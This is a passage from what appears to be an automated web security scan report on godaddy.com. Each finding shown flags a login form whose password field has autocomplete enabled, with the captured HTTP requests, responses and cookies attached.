Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/&sitename=www.godaddy.com&page=/domains/searchresults.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=44919%26hpGoogleStatic%3d1&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:32:08 GMT
Content-Length: 609450


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.34. http://www.godaddy.com/domains/searchreview.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /domains/searchreview.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /domains/searchreview.aspx?pd=yes HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
Accept: */*
Referer: http://www.godaddy.com/domains/searchreview.aspx?pd=yes
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ws5jw4vh5tuzq2dphfi4us5a; SplitValue1=75; flag1=cflag=us; currencypopin1=cdisplaypopin=false; GoogleADServicesgoogleadwordshome=zbnczeofsfcgdhzeqcxgcadeafyilatc; pathway=221039fb-1ef3-4a9c-9888-ebefb84fcda3; HPBackground=Danica2; MemPDC1=ljrecdtffbugaahgraqdyjybtizayfne; MemPDCLoc1=net; PCSplitValue1=1; GoogleADServicesgoogleadwordssearch=hbjjxbcaiaffadneicfbdagjqgiiggnd; BlueLithium_domainsearch=keydqgeemhudugljzexamaxfhjofnevf; BlueLithium=ldubxiuhpfmhtbbiyjmelhwaahghdbma; GoogleADServicesgooglessl=zbaitefefbwexbmflgoethnixhqjvich; pagecount=14; actioncount=; app_pathway=; visitor=vid=221039fb-1ef3-4a9c-9888-ebefb84fcda3; BlueLithium_ssl=chsduddeifteyewceiebbfsifczdjdig; ShopperId1=keraxfoewfthxjhclejcpjejtagbwdif; preferences1=_sid=pgkbxbqaugxggitbjadgnhzcwaubviyf&dataCenterCode=US&gdshop_currencyType=USD; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=http://www.godaddy.com/hosting/website-builder.aspx&sitename=www.godaddy.com&page=/domains/searchreview.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=pd=yes%26hpGoogleStatic%3d1&shopper=50585199&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:55:41 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/domains/searchreview.aspx?pd=yes&sitename=www.godaddy.com&page=/domains/searchreview.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=pd=yes%26hpGoogleStatic%3d1&shopper=50585199&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=221039fb-1ef3-4a9c-9888-ebefb84fcda3&referringdomain=&split=75; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:55:40 GMT
Content-Length: 93853


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.35. http://www.godaddy.com/ecommerce/shopping-cart.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ecommerce/shopping-cart.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ecommerce/shopping-cart.aspx?isc=gppt02C051&domain=edhardy.com HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=cf5phayqm0oycpa33nuq5hwm; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=cf5phayqm0oycpa33nuq5hwm; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:20 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:20 GMT; path=/
Set-Cookie: SplitValue1=99; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ecommerce/shopping-cart.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=gppt02C051&domain=edhardy.com&shopper=&privatelabelid=1&isc=gppt02C051&clientip=174.36.218.2&referringpath=&referringdomain=edhardy.com&split=99; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:19 GMT
Connection: close
Content-Length: 170650


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=gppt02C051&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.36. http://www.godaddy.com/ecommerce/shopping-cart.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /ecommerce/shopping-cart.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ecommerce/shopping-cart.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ybzxzywdjaq1pdh3lrzyntm; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=2ybzxzywdjaq1pdh3lrzyntm; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:20 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:20 GMT; path=/
Set-Cookie: SplitValue1=93; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/ecommerce/shopping-cart.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=93; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:19 GMT
Connection: close
Content-Length: 167563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.37. http://www.godaddy.com/email/email-hosting.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /email/email-hosting.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /email/email-hosting.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kpe4feamfubaq24rio3hlv2t; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kpe4feamfubaq24rio3hlv2t; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:13 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:13 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:13 GMT; path=/
Set-Cookie: SplitValue1=33; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:13 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/email/email-hosting.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=33; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:13 GMT
Connection: close
Content-Length: 140310


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.38. http://www.godaddy.com/email/email-hosting.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /email/email-hosting.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /email/email-hosting.aspx?isc=gppt02C017&domain=edhardy.com HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=ba0tehosltw1prskx2pzydtm; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=ba0tehosltw1prskx2pzydtm; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:14 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:14 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:14 GMT; path=/
Set-Cookie: SplitValue1=73; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:14 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/email/email-hosting.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=gppt02C017&domain=edhardy.com&shopper=&privatelabelid=1&isc=gppt02C017&clientip=174.36.218.2&referringpath=&referringdomain=edhardy.com&split=73; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:14 GMT
Connection: close
Content-Length: 143352


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=gppt02C017&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.39. http://www.godaddy.com/email/online-storage.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /email/online-storage.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /email/online-storage.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=3cw445ap1nqaqoz0itgtragy; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=3cw445ap1nqaqoz0itgtragy; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:14 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:14 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:14 GMT; path=/
Set-Cookie: SplitValue1=37; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:14 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/email/online-storage.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=37; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:14 GMT
Connection: close
Content-Length: 127813


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.40. http://www.godaddy.com/email/online-storage.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /email/online-storage.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /email/online-storage.aspx?isc=GPPT03C039&domain=edhardy.com HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=vzy4l4ghbtcrxqumq1kao0nn; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=vzy4l4ghbtcrxqumq1kao0nn; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:15 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:15 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:15 GMT; path=/
Set-Cookie: SplitValue1=49; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:15 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/email/online-storage.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=isc=GPPT03C039&domain=edhardy.com&shopper=&privatelabelid=1&isc=GPPT03C039&clientip=174.36.218.2&referringpath=&referringdomain=edhardy.com&split=49; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:14 GMT
Connection: close
Content-Length: 130934


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?isc=GPPT03C039&ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.41. http://www.godaddy.com/gear/godaddy-gear.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /gear/godaddy-gear.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /gear/godaddy-gear.aspx?ci=46906 HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=y5robm1tq2fdzrco0syk5nb1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=y5robm1tq2fdzrco0syk5nb1; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:58 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:58 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:41:58 GMT; path=/
Set-Cookie: SplitValue1=50; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:41:58 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/gear/godaddy-gear.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=ci=46906&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=50; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:41:58 GMT
Connection: close
Content-Length: 149154


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.42. http://www.godaddy.com/hosting/hosting.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/hosting.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hosting/hosting.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=fvodn0mfrre2zmbtygc4udg3; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=fvodn0mfrre2zmbtygc4udg3; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:51 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:51 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:51 GMT; path=/
Set-Cookie: SplitValue1=21; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:51 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/hosting.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=21; domain=godaddy.com; path=/
Set-Cookie: GoogleADServicesgoogleadwords=gibdbchcdbtbzakfeabgjhocjilbabki; domain=godaddy.com; expires=Sat, 05-Mar-2022 01:58:51 GMT; path=/
Date: Mon, 05 Mar 2012 01:58:51 GMT
Connection: close
Content-Length: 265687


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><sc
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.43. http://www.godaddy.com/hosting/web-hosting.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/web-hosting.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hosting/web-hosting.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=qrkddcczjfehgahecvhxbgue; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=qrkddcczjfehgahecvhxbgue; path=/; HttpOnly
Set-Cookie: SplitValue1=26; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:40:58 GMT; path=/
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:58 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:58 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:40:58 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/hosting/web-hosting.aspx&server=M1PWCORPWEB137&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=174.36.218.2&referringpath=&referringdomain=&split=26; domain=godaddy.com; path=/
Set-Cookie: BlueLithium=phidojrcgjbeyjgbxhlgdjsifbhbnarh; domain=godaddy.com; path=/
Date: Mon, 05 Mar 2012 01:40:57 GMT
Connection: close
Content-Length: 213912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><ti
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB137" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" type="password" name="password" id="password" value="" class="inp_iphone" />
</div>
...[SNIP]...

5.44. http://www.godaddy.com/hosting/web-hosting.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /hosting/web-hosting.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hosting/web-hosting.aspx?isc=smfbfos HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=uhgjn20frw3swqgzxqqdoitz; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=uhgjn20frw3swqgzxqqdoitz; path=/; HttpOnly
Set-Cookie: preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; domain=godaddy.com; path=/
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:49 GMT; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:49 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Tue, 05-Mar-2013 01:58:49 GMT; path=/
Set-Cookie: SplitValue1=41; domain=godaddy.com; expires=Tue, 06-Mar-2012 01:58:49 GMT; path=/
